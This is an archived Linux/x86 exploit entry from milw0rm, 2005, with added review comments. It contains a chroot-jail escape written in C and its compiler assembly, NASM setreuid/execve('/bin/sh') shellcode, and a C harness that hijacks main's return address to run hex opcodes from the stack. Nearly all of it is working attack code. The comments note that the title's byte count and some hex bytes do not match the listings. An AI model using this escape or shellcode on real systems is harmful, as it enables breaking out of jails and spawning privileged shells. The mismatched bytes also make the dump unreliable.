Linux/x86 – Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)
/*
Linux/x86 chroot-escape code (C and compiler-generated assembly) plus a standard setreuid/execve shellcode.
By Okti (http://okti.nm.ru)
----------------------------------------------------------------------------------------------
*/
/* Mkdir and Chroot are written in C: */
#include<stdio.h>
#include<errno.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<unistd.h>
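int main(void) {
	/*
	 * Classic chroot(2) escape.  chroot() replaces the root directory but
	 * does NOT change the working directory.  Chrooting into a freshly
	 * made subdirectory of the cwd therefore leaves the cwd *outside* the
	 * new root; a relative "../../.." path is then resolved from that cwd,
	 * walks up to the real filesystem root (".." is a no-op once there),
	 * and a second chroot() on it lands the process in the host root.
	 *
	 * What the code relies on: the caller may call chroot() at all
	 * (CAP_SYS_CHROOT - root on a stock system) and starts with its cwd
	 * inside the jail.  A jailer that chdir("/")s right after chroot()
	 * and drops CAP_SYS_CHROOT defeats this technique.
	 *
	 * Returns 0 on success, 1 if mkdir() or either chroot() fails (the
	 * failing call is reported with perror()).
	 */
	static const char dir[] = "sh";
	/* Any count that exceeds the jail's depth below the real root works;
	 * surplus ".." components are harmless at "/". */
	static const char climb[] =
		"../../../../../../../../../../../../../../../../../../../../../../../../";

	/* An existing "sh" directory from an earlier run is fine. */
	if (mkdir(dir, 0) == -1 && errno != EEXIST) {
		perror("mkdir");
		return 1;
	}
	/* Ownership/mode are cosmetic when already running as root; they are
	 * kept from the original but their failure is not fatal. */
	chown(dir, 0, 0);
	chmod(dir, S_IRUSR | S_IWUSR);

	/* Deliberately no chdir() here: the cwd must stay outside the new root. */
	if (chroot(dir) == -1) {
		perror("chroot");
		return 1;
	}
	if (chroot(climb) == -1) {
		perror("chroot");
		return 1;
	}
	return 0;
}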
----------------------------------------------------------------------------------------------
GCC 3.4 output (i386, AT&T/GAS syntax) for the C code above. The `../` run in `.LC1` appears shorter than the one in the C listing; the exact count is irrelevant as long as it exceeds the jail's depth below the real root.
----------------------------------------------------------------------------------------------
.file "y.c"
.section .rodata
.LC0:
.string "sh"
.align 4
.LC1:
.string "../../../../../../../../../../../../../../../../../../../../"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
subl $8, %esp
pushl $0
pushl $.LC0
call mkdir
addl $16, %esp
subl $4, %esp
pushl $0
pushl $0
pushl $.LC0
call chown
addl $16, %esp
subl $8, %esp
pushl $384
pushl $.LC0
call chmod
addl $16, %esp
subl $12, %esp
pushl $.LC0
call chroot
addl $16, %esp
subl $12, %esp
pushl $.LC1
call chroot
addl $16, %esp
leave
ret
.size main, .-main
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"
------------------------------------------------------------------------------------------------
Standard setreuid(0,0) + execve("/bin/sh") shellcode. The listing below assembles to 49 bytes from `_start` through the inline string; the "66 bytes" in the title does not appear to match any byte count derivable from these listings.
It uses the call/pop trick: `call one` pushes the address of the '/bin/sh' bytes that follow it and `pop ebx` retrieves it, so the string is carried inline in the code rather than fetched from the data segment.
The source contains no literal zero bytes, but older NASM releases encode the forward `jmp two` as a 5-byte near jump (e9 16 00 00 00, visible in the hex dump further down); write `jmp short two` if the payload must be NUL-free. Note also that no `section .text` is declared, so `_start` and the self-patching stores are placed in .data - that is why the standalone test runs where data pages are executable, and why it will fault on NX-enforcing systems.
To build and test: nasm -f elf shell.asm, then ld shell.o and ./a.out
------------------------------------------------------------------------------------------------
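; Linux/x86 (i386, int 0x80) shellcode: setreuid(0, 0) then
; execve("/bin/sh", {"/bin/sh", NULL}, {NULL}).  NASM, Intel syntax.
;
; Position independent: the "/bin/sh" bytes sit right after `call one`, the
; call pushes their address and `pop ebx` retrieves it (call/pop trick).
;
; NOTE(review): no `section .text` is declared, so `_start` and everything
; after it are assembled into .data.  The code patches its own bytes (the
; three stores at [ebx+7], [ebx+8], [ebx+12]), which needs a writable page;
; the .data placement provides that in the standalone `ld` test, but the
; page is executable only where NX is not enforced.  When injected, the
; target buffer must likewise be writable and executable.
; Syscall numbers are i386-specific (70 is the legacy 16-bit setreuid).

SYS_SETREUID	equ 70
SYS_EXECVE	equ 11

section .data
	db '/bin/sh'		; filler kept from the original; the payload uses the inline copy below

global _start
_start:
	; setreuid(uid_t ruid = 0, uid_t euid = 0) - succeeds only if the process is already privileged
	xor	eax, eax
	mov	al, SYS_SETREUID
	xor	ebx, ebx		; ruid = 0
	xor	ecx, ecx		; euid = 0
	int	0x80

	jmp	short two		; `short` forces eb rel8; a bare `jmp` in old NASM emits e9 rel32 with 0x00 bytes
one:
	pop	ebx			; ebx -> "/bin/sh" (return address pushed by `call one`)
	; execve(const char *filename, char *const argv[], char *const envp[])
	xor	eax, eax
	mov	[ebx+7], al		; NUL-terminate the string in place
	mov	[ebx+8], ebx		; argv[0] = "/bin/sh"
	mov	[ebx+12], eax		; argv[1] = NULL; the same word doubles as envp[0]
	mov	al, SYS_EXECVE
	lea	ecx, [ebx+8]		; argv
	lea	edx, [ebx+12]		; envp -> {NULL}
	int	0x80
two:
	call	one
	db	'/bin/sh'		; 7 bytes; the 9 bytes following them are overwritten by the stores above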
---------------------------------------------------------------------------------------------------
C harness carrying the hex opcodes: first a mkdir and a chroot syscall stub (these read their arguments from the stack and contain NUL bytes, so as given they are libc-wrapper-style code, not injectable shellcode), then the setreuid/execve shellcode above. The `\x` escape prefixes must be intact for the string literal to contain opcodes rather than ASCII text.
---------------------------------------------------------------------------------------------------
#include<stdio.h>
#include<stdlib.h>
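/*
 * Test harness: puts the opcode bytes in a stack buffer and overwrites
 * main's saved return address with the buffer's address, so the bytes
 * execute when main returns.
 *
 * Layout of `star` (offsets in bytes):
 *    0-16  mkdir stub : mov edx,ebx / mov ecx,[esp+8] / mov ebx,[esp+4] / mov eax,39 / int 0x80
 *   17-29  chroot stub: mov edx,ebx / mov ebx,[esp+4] / mov eax,61 / int 0x80
 *   30-36  "/bin/sh"  : filler matching the `section .data` string of the NASM listing
 *   37-85  the setreuid + execve shellcode from the NASM listing
 *
 * NOTE(review): the two stubs take their arguments from the stack and
 * contain 0x00 bytes, so they are not usable as injected shellcode as
 * given, and the 20x "../" chroot loop of the C/asm listings is absent here.
 * NOTE(review): \x89\x58\x08 decodes to `mov [eax+8], ebx` (eax is 0 at
 * that point), whereas the NASM source has `mov [ebx+8], ebx`, which
 * encodes as \x89\x5b\x08.  Verify this byte before relying on the dump.
 * NOTE(review): \xe9\x16\x00\x00\x00 is a near jmp carrying NUL bytes
 * (see the `jmp short` remark on the NASM listing).
 * The `offset = 4` frame walk, the pointer-to-int cast and running code
 * from the stack assume a 2005-era 32-bit build without a stack protector
 * or NX; the offset must be re-derived for any other compiler/ABI.
 */
int main() {
	int *ret;
	long offset = 4;	/* ints from &ret to the saved return address; compiler-specific */
	char star[] =
	"\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"
	"\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"
	"\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"
	"\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"
	"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68";
	/* Redirect main's return into the buffer (32-bit only: the cast truncates on 64-bit). */
	*((int *) &ret + offset) = (int) star;
	return 0;
}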
// milw0rm.com [2005-07-11]